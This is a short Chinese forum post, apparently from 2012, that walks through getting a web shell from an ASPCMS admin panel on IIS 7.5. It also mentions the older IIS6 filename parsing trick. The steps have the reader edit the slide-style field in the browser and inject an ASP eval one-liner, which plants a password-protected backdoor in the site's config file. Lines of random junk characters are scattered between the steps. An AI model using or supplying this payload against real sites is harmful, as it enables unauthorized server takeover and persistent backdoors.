aspcms在老版本中可以通过添加模板直接添加asp.但是新版的aspcms中已经限制了添加模板的格式为html,js,css,当然如果是遇到iis6的话还是可以通过iis6的解析漏洞把文件名改成1.asp;.html这样的格式来拿到shell的.可是如果遇到iis7.5呢?以下是本人自己找到挖掘到的aspcms通杀版本的后台拿shell方法.
7 F! D P2 |) f& L- G$ u/ B/ k$ v2 G1、进入后台,“扩展功能”--“幻灯片设置”--”幻灯样式”
( T: F, D k) t) r$ \. f& l- R7 ~9 `7 y$ O
5 z& b F# o( c( G
2 {, y1 w; l7 E# T+ p
2、使用chorme的审查元素功能或者firefox的firebug,总之使用能修改当前页面元素的工具就好了。将对应的slidestyle的value的值修改为1%><%Eval(Request (chr(65)))%><%
, q6 B8 i# v1 \4 `2 Y
3 t! i2 i; B7 T+ V8 o4 l; k2 h* I- m4 ~" i' s
3、一句话木马,密码a。在/config/AspCms_Config.asp
! D4 h$ Y5 n1 e9 B8 }8 B% t, m+ ]6 n9 Q; a" ^$ N
; `: X+ |1 z" Z( W* o6 n. R
|
发表于 2012-11-9 20:55:05
收藏
支持
反对